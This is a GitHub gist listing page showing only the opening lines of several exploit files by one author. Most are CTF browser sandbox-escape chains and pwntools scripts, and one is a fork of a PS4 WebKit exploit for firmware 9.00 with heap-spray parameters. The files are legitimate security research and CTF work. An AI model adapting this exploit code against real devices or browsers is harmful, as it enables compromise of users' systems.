let pwn = async function() {
/* Helpers */
let conversionBuffer = new ArrayBuffer(0x40)
let floatView = new Float64Array(conversionBuffer)
let intView = new BigUint64Array(conversionBuffer)
BigInt.prototype.i2f = function() {
intView[0] = this
Harsh khuha hkraw
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <head> | |
| <title>google-ctf fullchain</title> | |
| </head> | |
| <body> | |
| <h1>HK</h1> | |
| <pre id='log'></pre> | |
| </body> | |
| <script src='./mojo/mojo_bindings.js'></script> | |
| <script src="./mojo/third_party/blink/public/mojom/blob/blob_registry.mojom.js"></script> |
hkraw
/ ps4.html
Created
October 28, 2021 05:56
— forked from sleirsgoevy/ps4.html
PS4 WebKit exploit on 9.00
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script> | |
| var PAGE_SIZE = 16384; | |
| var SIZEOF_CSS_FONT_FACE = 0xb8; | |
| var HASHMAP_BUCKET = 208; | |
| var STRING_OFFSET = 20; | |
| var SPRAY_FONTS = 0x1000; | |
| var GUESS_FONT = 0x200430000; | |
| var NPAGES = 20; | |
| var INVALID_POINTER = 0; | |
| var HAMMER_FONT_NAME = "font8"; //must take bucket 3 of 8 (counting from zero) |
let wasm_code = new Uint8Array([
0, 97,115,109, 1, 0, 0, 0, 1,133,128,128,128, 0,
1, 96, 0, 1,127, 3,130,128,128,128, 0, 1, 0, 4,
132,128,128,128, 0, 1,112, 0, 0, 5,131,128,128,128,
0, 1, 0, 1, 6,129,128,128,128, 0, 0, 7,145,128,
128,128, 0,2,6,109,101,109,111,114,121,2,0,4,109,97,
105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,
0,65,42,11
hkraw
/ 0ctf2020-fullchain++-cfi.html
Created
July 14, 2021 11:03
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <head> | |
| <title>0ctf sbx</title> | |
| </head> | |
| <body> | |
| <h1>HK</h1> | |
| <pre id='log'></pre> | |
| </body> | |
| <script src='./mojo_bindings.js'></script> | |
| <script src='./mojo_js/third_party/blink/public/mojom/tstorage/tstorage.mojom.js'></script> |
hkraw
/ redpwn-empires.html
Created
July 10, 2021 13:02
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <head> | |
| <title>RedPwn sbx-1</title> | |
| </head> | |
| <body> | |
| <h1>:thonk:</h1> | |
| <pre id='log'></pre> | |
| </body> | |
| <script src='./mojo_bindings.js'></script> | |
| <script src='./third_party/blink/public/mojom/desert.mojom.js'></script> |
hkraw
/ keybase.md
Created
July 1, 2021 09:21
I hereby claim:
- I am hkraw on github.
- I am hk_1 (https://keybase.io/hk_1) on keybase.
- I have a public key ASAiWZwBEgYD4haHSMpi69K7qQ3kv_AsA1Em2iSRXOwVGgo
To claim this, I am signing this object:
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <iostream> | |
| #include <pwntools> | |
| #include <string> | |
| uint64_t vtable_offset = 0x210b60; | |
| uint64_t openat_got_offset = 0x210fe8; | |
| uint64_t libc_open_offset = 0xf6450; | |
| class Ghost { |
hkraw
/ javascript-for-dummies-1.js
Created
June 6, 2021 04:32
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function pwn() { | |
| /* Helpers */ | |
| var k_jsObjectSize = 0x70 | |
| var fclose_got = 0x45e58 | |
| var __libc_atoi = 0x18ea90 | |
| var __libc_environ = 0x1ef2e0 | |
| var __free_got = 0x4dde0 | |
| var __je_free = 0x13b10 |
hkraw
/ moosl-(╯°□°)╯︵ ┻━┻.py
Created
May 2, 2021 22:52
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| from pwn import * | |
| from binascii import hexlify, unhexlify | |
| context.update(arch='amd64', os='linux') | |
| # helpers | |
| def store(key, keySize, value, valueSize): | |
| io.sendlineafter('option: ','1') | |
| io.sendlineafter('key size: ',str(keySize)) |
NewerOlder